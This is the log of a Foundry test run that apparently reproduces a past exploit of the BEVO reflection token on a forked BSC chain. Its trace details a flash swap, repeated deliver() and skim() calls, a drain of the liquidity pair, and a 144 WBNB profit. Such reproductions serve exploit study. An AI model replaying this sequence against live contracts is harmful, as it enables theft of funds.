Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.14s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.97s (1.94ms CPU time)

Ran 1 test for src/test/2023-01/BEVO_exp.sol:BEVOExploit
[PASS] testExploit() (gas: 414552)
Logs:
  WBNB balance after exploit: 144.000000000000000000

Traces:
  [10353] BEVOExploit::setUp()
    ├─ [0] VM::createSelectFork("bsc", 25230702 [2.523e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], "WBNB")
    │   └─ ← [Return]
    ├─ [0] VM::label(BEVO: [0xc6Cb12df4520B7Bf83f64C79c585b8462e18B6Aa], "BEVO")
    │   └─ ← [Return]
    ├─ [0] VM::label(PancakePair: WBNB-USDC: [0xd99c7F6C65857AC913a8f880A4cb84032AB2FC5b], "PancakePair: WBNB-USDC")
    │   └─ ← [Return]
    ├─ [0] VM::label(PancakePair: BEVO-WBNB: [0xA6eB184a4b8881C0a4F7F12bBF682FD31De7a633], "PancakePair: BEVO-WBNB")
    │   └─ ← [Return]
    ├─ [0] VM::label(PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], "PancakeRouter")
    │   └─ ← [Return]
    └─ ← [Stop]

  [445652] BEVOExploit::testExploit()
    ├─ [24420] WBNB::approve(PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x0072fde0c25a54a99a0517f551c3cabc4c49d9ef3648fd789a3f57d0243cdb90: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [409813] PancakePair: WBNB-USDC::swap(0, 192500000000000000000 [1.925e20], BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [29962] WBNB::transfer(BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 192500000000000000000 [1.925e20])
    │   │   ├─ emit Transfer(from: PancakePair: WBNB-USDC: [0xd99c7F6C65857AC913a8f880A4cb84032AB2FC5b], to: BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 192500000000000000000 [1.925e20])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000000a6f7962175eb20000
    │   │   │   @ 0x2f2061472082b519ca1a27145bcbc56e499e5d8d112879a998d42c4cfbac4874: 0x0000000000000000000000000000000000000000000001aa120414e036667460 → 0x00000000000000000000000000000000000000000000019fa28ab2c8d7b47460
    │   │   └─ ← [Return] true
    │   ├─ [331144] BEVOExploit::pancakeCall(BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 192500000000000000000 [1.925e20], 0x00)
    │   │   ├─ [534] WBNB::balanceOf(BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 192500000000000000000 [1.925e20]
    │   │   ├─ [191226] PancakeRouter::swapExactTokensForTokensSupportingFeeOnTransferTokens(192500000000000000000 [1.925e20], 0, [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xc6Cb12df4520B7Bf83f64C79c585b8462e18B6Aa], BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1675071422 [1.675e9])
    │   │   │   ├─ [8225] WBNB::transferFrom(BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], PancakePair: BEVO-WBNB: [0xA6eB184a4b8881C0a4F7F12bBF682FD31De7a633], 192500000000000000000 [1.925e20])
    │   │   │   │   ├─ emit Transfer(from: BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: PancakePair: BEVO-WBNB: [0xA6eB184a4b8881C0a4F7F12bBF682FD31De7a633], value: 192500000000000000000 [1.925e20])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x5ec404d1569e18de8ac9d90e34424cea5f337b74f062568a5c0d2f88ce923e86: 0x000000000000000000000000000000000000000000000007e649b151408d913f → 0x00000000000000000000000000000000000000000000001255c313689f3f913f
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000000a6f7962175eb20000 → 0
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [21177] BEVO::balanceOf(BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   ├─ [2893] PancakePair: BEVO-WBNB::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 145721197780523651391 [1.457e20], 5327282266398899539 [5.327e18], 1673083038 [1.673e9]
    │   │   │   ├─ [534] WBNB::balanceOf(PancakePair: BEVO-WBNB: [0xA6eB184a4b8881C0a4F7F12bBF682FD31De7a633]) [staticcall]
    │   │   │   │   └─ ← [Return] 338221197780523651391 [3.382e20]
    │   │   │   ├─ [141078] PancakePair: BEVO-WBNB::swap(0, 3028774323006137313 [3.028e18], BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [102047] BEVO::transfer(BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 3028774323006137313 [3.028e18])
    │   │   │   │   │   ├─ emit Transfer(from: PancakePair: BEVO-WBNB: [0xA6eB184a4b8881C0a4F7F12bBF682FD31De7a633], to: 0x473141B6f5E33DD90BD653940a854b58e83451DB, value: 302877432300613 [3.028e14])
    │   │   │   │   │   ├─ emit Transfer(from: BEVO: [0xc6Cb12df4520B7Bf83f64C79c585b8462e18B6Aa], to: 0x0000000000000000000000000000000000000000, value: 302877432300613 [3.028e14])
    │   │   │   │   │   ├─ emit Transfer(from: PancakePair: BEVO-WBNB: [0xA6eB184a4b8881C0a4F7F12bBF682FD31De7a633], to: BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 3027865690709235474 [3.027e18])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xcb3dcf7ede8bb9e8a43e8d01097d62ee6daab75067dbb985c099c07dc82d546f: 0x000000000000000000000000000000000000000000000000281e7534dc0d7d0d → 0x000000000000000000000000000000000000000000000000281f88ac01d0c152
    │   │   │   │   │   │   @ 16: 0x0000000000000000000000000000000000000000000000000172bc1162dee1ad → 0x0000000000000000000000000000000000000000000000000173cf8888a225f2
    │   │   │   │   │   │   @ 0xbf47d8cbc0031e7074ba209dc50a401af8730d945893e24b131bb6981bcb8c99: 0x00036bcd32316e6d13298e1ad9298113c7eb5e4e490e5eb6ff03948ed53c1d1a → 0x00056b6aa9505c76de989e812231671a5b534e27914087be5fce833f1bd3c15b
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x4e0af824c2d5c98b811593d535f9f0e0623521a4f1eaa527cb3e20ddcf5d136a
    │   │   │   │   │   │   @ 17: 0x000000000000000000000000000000000000000000000000016c9fe2c53d1c0d → 0x000000000000000000000000000000000000000000000000016db359eb006052
    │   │   │   │   │   │   @ 0xcb3ce5706a8c0dd8eddcad33616b3f13db1afd0459f65bfc3870881808aef9ba: 0x894f5d2d7a4c919beac042aa02fd40cc350ea6594e9624c96d5da4870afe9050 → 0x3b3e66305219fdf3075d7da1f1eb9dd818a1b5288415048b7fbeb79867da9023
    │   │   │   │   │   │   @ 14: 0x00000000000000000000000000000000000000000000000043f80278b121d363 → 0x00000000000000000000000000000000000000000000000043f6ef018b5e8f1e
    │   │   │   │   │   │   @ 15: 0x8950820f9440fa67bc8000383fe398260462725d3782914f291d58b2c4e6aaff → 0x894a83372ee4304a5a32cf0564cbe6124a2aa2d15eec163906bc8ca1f11fbe3c
    │   │   │   │   │   │   @ 18: 0x000000000000000000000000000000000000000000000000281e7534dc0d7d0d → 0x000000000000000000000000000000000000000000000000281f88ac01d0c152
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [534] WBNB::balanceOf(PancakePair: BEVO-WBNB: [0xA6eB184a4b8881C0a4F7F12bBF682FD31De7a633]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 338221197780523651391 [3.382e20]
    │   │   │   │   ├─ [5177] BEVO::balanceOf(PancakePair: BEVO-WBNB: [0xA6eB184a4b8881C0a4F7F12bBF682FD31De7a633]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 2298813336114922094 [2.298e18]
    │   │   │   │   ├─ emit Sync(reserve0: 338221197780523651391 [3.382e20], reserve1: 2298813336114922094 [2.298e18])
    │   │   │   │   ├─ emit Swap(sender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 192500000000000000000 [1.925e20], amount1In: 305392722159868 [3.053e14], amount0Out: 0, amount1Out: 3028774323006137313 [3.028e18], to: BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 9: 0x0000000000000000000000000000001af02b94b6d5f9dba1127e2ff04ffd613d → 0x0000000000000000000000000000001c0c1f03cd78334eebafe9313840fbf29d
    │   │   │   │   │   @ 10: 0x00000000000000000000000000008c1e398fffedd6c9ef25a9522b74935e02ea → 0x00000000000000000000000000008f5c25a1aef34411b935baaf18e7cc57354a
    │   │   │   │   │   @ 8: 0x63b9389e00000000000049ee4eff02f1bd53000000000007e649b151408d913f → 0x63d78fbe0000000000001fe7068cb00f826e00000000001255c313689f3f913f
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [5177] BEVO::balanceOf(BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 3028267986646483923 [3.028e18]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [5177] BEVO::balanceOf(BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 3028267986646483923 [3.028e18]
    │   │   ├─ [11609] BEVO::deliver(3028267986646483923 [3.028e18])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 15: 0x894a83372ee4304a5a32cf0564cbe6124a2aa2d15eec163906bc8ca1f11fbe3c → 0x3b3f8b126c0e66c03f1d0db50bf0783f0f9c6bba2f8aaa9b88dbbe3c23668c20
    │   │   │   │   @ 16: 0x0000000000000000000000000000000000000000000000000173cf8888a225f2 → 0x0000000000000000000000000000000000000000000000002b7a6139056269c5
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x4e0af824c2d5c98b811593d535f9f0e0623521a4f1eaa527cb3e20ddcf5d136a → 0x000000000000000165ffd284dd1e830d27a6ea8dc289398a4d5d527801a3e14e
    │   │   │   └─ ← [Stop]
    │   │   ├─ [48187] PancakePair: BEVO-WBNB::skim(BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─ [534] WBNB::balanceOf(PancakePair: BEVO-WBNB: [0xA6eB184a4b8881C0a4F7F12bBF682FD31De7a633]) [staticcall]
    │   │   │   │   └─ ← [Return] 338221197780523651391 [3.382e20]
    │   │   │   ├─ [3262] WBNB::transfer(BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   │   │   │   ├─ emit Transfer(from: PancakePair: BEVO-WBNB: [0xA6eB184a4b8881C0a4F7F12bBF682FD31De7a633], to: BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 0)
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [5177] BEVO::balanceOf(PancakePair: BEVO-WBNB: [0xA6eB184a4b8881C0a4F7F12bBF682FD31De7a633]) [staticcall]
    │   │   │   │   └─ ← [Return] 6844218532359160336 [6.844e18]
    │   │   │   ├─ [31747] BEVO::transfer(BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 4545405196244238242 [4.545e18])
    │   │   │   │   ├─ emit Transfer(from: PancakePair: BEVO-WBNB: [0xA6eB184a4b8881C0a4F7F12bBF682FD31De7a633], to: 0x473141B6f5E33DD90BD653940a854b58e83451DB, value: 454540519624423 [4.545e14])
    │   │   │   │   ├─ emit Transfer(from: BEVO: [0xc6Cb12df4520B7Bf83f64C79c585b8462e18B6Aa], to: 0x0000000000000000000000000000000000000000, value: 454540519624423 [4.545e14])
    │   │   │   │   ├─ emit Transfer(from: PancakePair: BEVO-WBNB: [0xA6eB184a4b8881C0a4F7F12bBF682FD31De7a633], to: BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 4544041574685364973 [4.544e18])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 17: 0x000000000000000000000000000000000000000000000000016db359eb006052 → 0x000000000000000000000000000000000000000000000000016f50c0e135af39
    │   │   │   │   │   @ 18: 0x000000000000000000000000000000000000000000000000281f88ac01d0c152 → 0x00000000000000000000000000000000000000000000000028212612f8061039
    │   │   │   │   │   @ 15: 0x3b3f8b126c0e66c03f1d0db50bf0783f0f9c6bba2f8aaa9b88dbbe3c23668c20 → 0x3b3c8583c6b8b7b5d29d6d30adf63677690860da9d49c83e3c47cce5e2545d7e
    │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000165ffd284dd1e830d27a6ea8dc289398a4d5d527801a3e14e → 0x2755567a2656e770850b872177110f9bc4750e93b99393f1a25c5bc4f76ae7a0
    │   │   │   │   │   @ 0xcb3ce5706a8c0dd8eddcad33616b3f13db1afd0459f65bfc3870881808aef9ba: 0x3b3e66305219fdf3075d7da1f1eb9dd818a1b5288415048b7fbeb79867da9023 → 0x13e60a27866d67797bd22880f9fecf81d53f8642fac9c7c6de2bbcf531015b2f
    │   │   │   │   │   @ 14: 0x00000000000000000000000000000000000000000000000043f6ef018b5e8f1e → 0x00000000000000000000000000000000000000000000000043f5519a95294037
    │   │   │   │   │   @ 0xbf47d8cbc0031e7074ba209dc50a401af8730d945893e24b131bb6981bcb8c99: 0x00056b6aa9505c76de989e812231671a5b534e27914087be5fce833f1bd3c15b → 0x00066d44e06cec2502c32957ec2f7d0792d9fc721756288823ffd3b131847b91
    │   │   │   │   │   @ 16: 0x0000000000000000000000000000000000000000000000002b7a6139056269c5 → 0x0000000000000000000000000000000000000000000000002b7bfe9ffb97b8ac
    │   │   │   │   │   @ 0xcb3dcf7ede8bb9e8a43e8d01097d62ee6daab75067dbb985c099c07dc82d546f: 0x000000000000000000000000000000000000000000000000281f88ac01d0c152 → 0x00000000000000000000000000000000000000000000000028212612f8061039
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Stop]
    │   │   ├─ [5177] BEVO::balanceOf(BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 4544947785463603859 [4.544e18]
    │   │   ├─ [11609] BEVO::deliver(4544947785463603859 [4.544e18])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 15: 0x3b3c8583c6b8b7b5d29d6d30adf63677690860da9d49c83e3c47cce5e2545d7e → 0x13e72f09a061d0454db03a70cc8f0e4a1b2c30e243dc517207e5ca1fd5f3c1e1
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x2755567a2656e770850b872177110f9bc4750e93b99393f1a25c5bc4f76ae7a0 → 0x0000000000000000001e546195a9e76e7698de9b60261d256dfa58feeb0a4c03
    │   │   │   │   @ 16: 0x0000000000000000000000000000000000000000000000002b7bfe9ffb97b8ac → 0x0000000000000000000000000000000000000000000000006a8ee48e3ed95b3f
    │   │   │   └─ ← [Stop]
    │   │   ├─ [42901] PancakePair: BEVO-WBNB::swap(337000000000000000000 [3.37e20], 0, BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   ├─ [23162] WBNB::transfer(BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 337000000000000000000 [3.37e20])
    │   │   │   │   ├─ emit Transfer(from: PancakePair: BEVO-WBNB: [0xA6eB184a4b8881C0a4F7F12bBF682FD31De7a633], to: BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 337000000000000000000 [3.37e20])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000001244d0827f5aa40000
    │   │   │   │   │   @ 0x5ec404d1569e18de8ac9d90e34424cea5f337b74f062568a5c0d2f88ce923e86: 0x00000000000000000000000000000000000000000000001255c313689f3f913f → 0x00000000000000000000000000000000000000000000000010f290e9449b913f
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] WBNB::balanceOf(PancakePair: BEVO-WBNB: [0xA6eB184a4b8881C0a4F7F12bBF682FD31De7a633]) [staticcall]
    │   │   │   │   └─ ← [Return] 1221197780523651391 [1.221e18]
    │   │   │   ├─ [5177] BEVO::balanceOf(PancakePair: BEVO-WBNB: [0xA6eB184a4b8881C0a4F7F12bBF682FD31De7a633]) [staticcall]
    │   │   │   │   └─ ← [Return] 728234950164515176689 [7.282e20]
    │   │   │   ├─ emit Sync(reserve0: 1221197780523651391 [1.221e18], reserve1: 728234950164515176689 [7.282e20])
    │   │   │   ├─ emit Swap(sender: BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 0, amount1In: 725936136828400254595 [7.259e20], amount0Out: 337000000000000000000 [3.37e20], amount1Out: 0, to: BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 8: 0x63d78fbe0000000000001fe7068cb00f826e00000000001255c313689f3f913f → 0x63d78fbe0000000000277a4a44d20c38c0f100000000000010f290e9449b913f
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3262] WBNB::transfer(PancakePair: WBNB-USDC: [0xd99c7F6C65857AC913a8f880A4cb84032AB2FC5b], 193000000000000000000 [1.93e20])
    │   │   │   ├─ emit Transfer(from: BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: PancakePair: WBNB-USDC: [0xd99c7F6C65857AC913a8f880A4cb84032AB2FC5b], value: 193000000000000000000 [1.93e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x2f2061472082b519ca1a27145bcbc56e499e5d8d112879a998d42c4cfbac4874: 0x00000000000000000000000000000000000000000000019fa28ab2c8d7b47460 → 0x0000000000000000000000000000000000000000000001aa18f4703a0a187460
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000001244d0827f5aa40000 → 0x000000000000000000000000000000000000000000000007ce66c50e28400000
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Stop]
    │   ├─ [9796] 0x8AC76a51cc950d9822D68b83fE1Ad97B32Cd580d::balanceOf(PancakePair: WBNB-USDC: [0xd99c7F6C65857AC913a8f880A4cb84032AB2FC5b]) [staticcall]
    │   │   ├─ [2553] 0xBA5Fe23f8a3a24BEd3236F05F2FcF35fd0BF0B5C::balanceOf(PancakePair: WBNB-USDC: [0xd99c7F6C65857AC913a8f880A4cb84032AB2FC5b]) [delegatecall]
    │   │   │   └─ ← [Return] 2419698099143706937273612 [2.419e24]
    │   │   └─ ← [Return] 2419698099143706937273612 [2.419e24]
    │   ├─ [534] WBNB::balanceOf(PancakePair: WBNB-USDC: [0xd99c7F6C65857AC913a8f880A4cb84032AB2FC5b]) [staticcall]
    │   │   └─ ← [Return] 7860111160946076447840 [7.86e21]
    │   ├─ emit Sync(reserve0: 2419698099143706937273612 [2.419e24], reserve1: 7860111160946076447840 [7.86e21])
    │   ├─ emit Swap(sender: BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 0, amount1In: 193000000000000000000 [1.93e20], amount0Out: 0, amount1Out: 192500000000000000000 [1.925e20], to: BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 9: 0x000000000000000000000000000000027eaccf0a9a97a4df9a2fb615236e7aba → 0x000000000000000000000000000000027eacef78a2d7d5d993a9412543a9c666
    │   │   @ 10: 0x0000000000000000000000000004d612224632e852e651dd64d118317954154d → 0x0000000000000000000000000004d612512cedae85a844e7cc6c0ccae71bcb06
    │   │   @ 8: 0x63d78f970000000001aa120414e03666746000000002006418c7653a223e2d0c → 0x63d78fbe0000000001aa18f4703a0a18746000000002006418c7653a223e2d0c
    │   └─ ← [Stop]
    ├─ [534] WBNB::balanceOf(BEVOExploit: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 144000000000000000000 [1.44e20]
    ├─ emit log_named_decimal_uint(key: "WBNB balance after exploit", val: 144000000000000000000 [1.44e20], decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 24.15s (21.73s CPU time)

Ran 2 test suites in 24.17s (26.11s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
